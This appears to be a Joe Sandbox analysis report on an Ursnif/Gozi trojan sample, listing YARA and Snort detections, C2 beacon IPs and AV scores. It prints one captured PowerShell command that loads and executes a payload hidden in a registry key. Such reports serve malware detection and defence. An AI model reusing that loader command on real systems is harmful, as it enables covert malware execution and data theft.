Process Memory Space: powershell.exe PID: 4292	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x5c051c:$b2: ::FromBase64String( 0x19505f:$s1: -join 0x23ad37:$s1: -join 0x5693f1:$s1: -join 0x5764c6:$s1: -join 0x579898:$s1: -join 0x579f4a:$s1: -join 0x57ba3b:$s1: -join 0x57dc41:$s1: -join 0x57e468:$s1: -join 0x57ecd8:$s1: -join 0x57f413:$s1: -join 0x57f445:$s1: -join 0x57f48d:$s1: -join 0x57f4ac:$s1: -join 0x57fcfc:$s1: -join 0x57fe78:$s1: -join 0x57fef0:$s1: -join 0x57ff83:$s1: -join 0x5801e9:$s1: -join 0x58237f:$s1: -join
Process Memory Space: powershell.exe PID: 4292	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x1ec0:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2010:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1f00:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x204f:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2402:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x34ab:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1f73:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x20bd:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x2186:$a6: http://constitution.org/usdeclar.txt 0x3256:$a6: http://constitution.org/usdeclar.txt 0x22e5:$a7: grabs= 0x3369:$a7: grabs= 0x266e:$a8: CHROME.DLL 0x3756:$a8: CHROME.DLL 0x6e9:$a9: Software\AppDataLow\Software\Microsoft\ 0x215e:$a9: Software\AppDataLow\Software\Microsoft\ 0x322d:$a9: Software\AppDataLow\Software\Microsoft\ 0xe431e:$a9: Software\AppDataLow\Software\Microsoft\ 0xe45db:$a9: Software\AppDataLow\Software\Microsoft\ 0xe46fd:$a9: Software\AppDataLow\Software\Microsoft\ 0xe4df0:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: RuntimeBroker.exe PID: 3124	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 3124	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x618c5:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x61a17:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x61905:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x61a56:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x61e09:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x62eb2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x61978:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x61ac4:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x61b8d:$a6: http://constitution.org/usdeclar.txt 0x62c5d:$a6: http://constitution.org/usdeclar.txt 0x61cec:$a7: grabs= 0x62d70:$a7: grabs= 0x62075:$a8: CHROME.DLL 0x6315d:$a8: CHROME.DLL 0x2a7b9:$a9: Software\AppDataLow\Software\Microsoft\ 0x2a805:$a9: Software\AppDataLow\Software\Microsoft\ 0x2a853:$a9: Software\AppDataLow\Software\Microsoft\ 0x2a8b1:$a9: Software\AppDataLow\Software\Microsoft\ 0x2a910:$a9: Software\AppDataLow\Software\Microsoft\ 0x2a966:$a9: Software\AppDataLow\Software\Microsoft\ 0x2a9c2:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: RuntimeBroker.exe PID: 4372	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4372	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x46208:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x46358:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x46248:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x46397:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4674a:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x477f3:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x462bb:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x46405:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x464ce:$a6: http://constitution.org/usdeclar.txt 0x4759e:$a6: http://constitution.org/usdeclar.txt 0x4662d:$a7: grabs= 0x476b1:$a7: grabs= 0x469b6:$a8: CHROME.DLL 0x47a9e:$a8: CHROME.DLL 0x25b2f:$a9: Software\AppDataLow\Software\Microsoft\ 0x25b7b:$a9: Software\AppDataLow\Software\Microsoft\ 0x25bd3:$a9: Software\AppDataLow\Software\Microsoft\ 0x25c31:$a9: Software\AppDataLow\Software\Microsoft\ 0x25c93:$a9: Software\AppDataLow\Software\Microsoft\ 0x25ce9:$a9: Software\AppDataLow\Software\Microsoft\ 0x25d45:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: RuntimeBroker.exe PID: 4552	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4552	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xe596:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xe6e6:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xe5d6:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xe725:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xead8:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xfb81:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xe649:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xe793:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xe85c:$a6: http://constitution.org/usdeclar.txt 0xf92c:$a6: http://constitution.org/usdeclar.txt 0xe9bb:$a7: grabs= 0xfa3f:$a7: grabs= 0xed44:$a8: CHROME.DLL 0xfe2c:$a8: CHROME.DLL 0xe834:$a9: Software\AppDataLow\Software\Microsoft\ 0xf903:$a9: Software\AppDataLow\Software\Microsoft\ 0x2d668:$a9: Software\AppDataLow\Software\Microsoft\ 0x2d705:$a9: Software\AppDataLow\Software\Microsoft\ 0x2d81f:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b2c8:$a9: Software\AppDataLow\Software\Microsoft\ 0x3b314:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: cmd.exe PID: 5832	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cmd.exe PID: 5832	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x1319:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x145c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x4ee4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5027:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x15d88:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x15ecb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1359:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x149b:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4f24:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5066:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x15dc8:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x15f0a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x17f9:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x2863:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x53c4:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x642e:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x16268:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x172d2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x13cc:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1509:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x4f97:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
Process Memory Space: cmd.exe PID: 1920	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cmd.exe PID: 1920	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x5816:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5966:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8c4f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x8d9f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x16e24:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x16f74:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1a346:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1a496:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5856:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x59a5:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x8c8f:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x8dde:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x16e64:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x16fb3:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1a386:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1a4d5:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5d58:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x6e01:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x9191:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xa23a:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x17366:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
Process Memory Space: powershell.exe PID: 6064	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6064	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xd81a1:$b2: ::FromBase64String( 0x1522c3:$b2: ::FromBase64String( 0x20238c:$s1: -join 0x20d698:$s1: -join 0x22b191:$s1: -join 0x1e63:$s4: += 0x203785:$s4: += 0x205ee7:$s4: += 0x205f66:$s4: += 0x206181:$s4: += 0x206204:$s4: += 0x206c8c:$s4: += 0x207091:$s4: += 0x20a5b1:$s4: += 0x20a5d0:$s4: += 0x20a60b:$s4: += 0x20a628:$s4: += 0x20a663:$s4: += 0x20a6cf:$s4: += 0x20a75b:$s4: += 0x20a85a:$s4: +=
Process Memory Space: powershell.exe PID: 6064	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x394f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x3a9f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5244:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5394:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1faf86:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1fb0d6:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x23dc26:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x23dd76:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x398f:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3ade:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5284:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x53d3:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1fafc6:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1fb115:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x23dc66:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x23ddb5:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x3e91:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x4398:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5786:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5c8d:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1fb4c8:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
Process Memory Space: csc.exe PID: 5836	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: csc.exe PID: 5836	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbdce:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xbf1e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xecc7:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xee17:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x11d74:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x11ec4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x4bcbb:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x4be0b:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xbe0e:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xbf5d:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xed07:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xee56:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x11db4:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x11f03:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4bcfb:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x4be4a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc310:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xd3b9:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xf209:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x102b2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x122b6:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
Process Memory Space: cvtres.exe PID: 1716	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cvtres.exe PID: 1716	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x996c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x9abc:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x10957:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x10aa7:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1453e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1468e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x99ac:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x9afb:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x10997:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x10ae6:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1457e:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x146cd:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x9eae:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xaf57:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x10e99:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x11f42:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x14a80:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x15b29:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x9a1f:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x9b69:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x10a0a:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
Process Memory Space: csc.exe PID: 3536	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: csc.exe PID: 3536	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x2525:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2675:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x575a:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x58aa:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xddf7:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xdf47:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2565:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x26b4:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x579a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x58e9:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xde37:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xdf86:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2a67:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x3b10:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5c9c:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x6d45:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xe339:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xf3e2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x25d8:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x2722:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x580d:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
Process Memory Space: cvtres.exe PID: 5240	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cvtres.exe PID: 5240	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x2a16:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2b66:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xdfd7:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xe127:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x10f0e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1105e:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2a56:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2ba5:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xe017:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xe166:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x10f4e:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1109d:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2f58:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x4001:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xe519:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xf5c2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x11450:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x124f9:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x2ac9:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x2c13:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xe08a:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
Click to see the 170 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.Lx6.exe.d294a0.7.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.Lx6.exe.420000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.Lx6.exe.d294a0.7.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.Lx6.exe.109d4a0.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.Lx6.exe.109d4a0.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.Lx6.exe.111c4a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.Lx6.exe.1148948.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4292, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline, ProcessId: 1264, ProcessName: csc.exe

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 194.76.225.61

Timestamp:	192.168.2.4194.76.225.6149703802033204 10/11/22-15:05:22.646934
SID:	2033204
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 194.76.225.61

Timestamp:	192.168.2.4194.76.225.6149703802033203 10/11/22-15:04:23.184080
SID:	2033203
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 52.169.118.173

Timestamp:	192.168.2.452.169.118.17349701802033203 10/11/22-15:04:05.807282
SID:	2033203
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 52.169.118.173

Timestamp:	192.168.2.452.169.118.17349698802033203 10/11/22-15:01:36.640930
SID:	2033203
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 52.169.118.173

Timestamp:	192.168.2.452.169.118.17349698802033204 10/11/22-15:01:36.640930
SID:	2033204
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon 3 - Source IP: 192.168.2.4 - Destination IP: 194.76.225.61

Timestamp:	192.168.2.4194.76.225.6149703802021814 10/11/22-15:05:22.646934
SID:	2021814
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 194.76.225.60

Timestamp:	192.168.2.4194.76.225.6049700802033204 10/11/22-15:01:58.649008
SID:	2033204
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 194.76.225.60

Timestamp:	192.168.2.4194.76.225.6049700802033203 10/11/22-15:01:58.649008
SID:	2033203
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Lx6.exe	ReversingLabs: Detection: 66%
Source: Lx6.exe	Virustotal: Detection: 63%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: Lx6.exe

Avira: detected

Machine Learning detection for sample

Source: Lx6.exe

Joe Sandbox ML: detected

Source: 0.0.Lx6.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
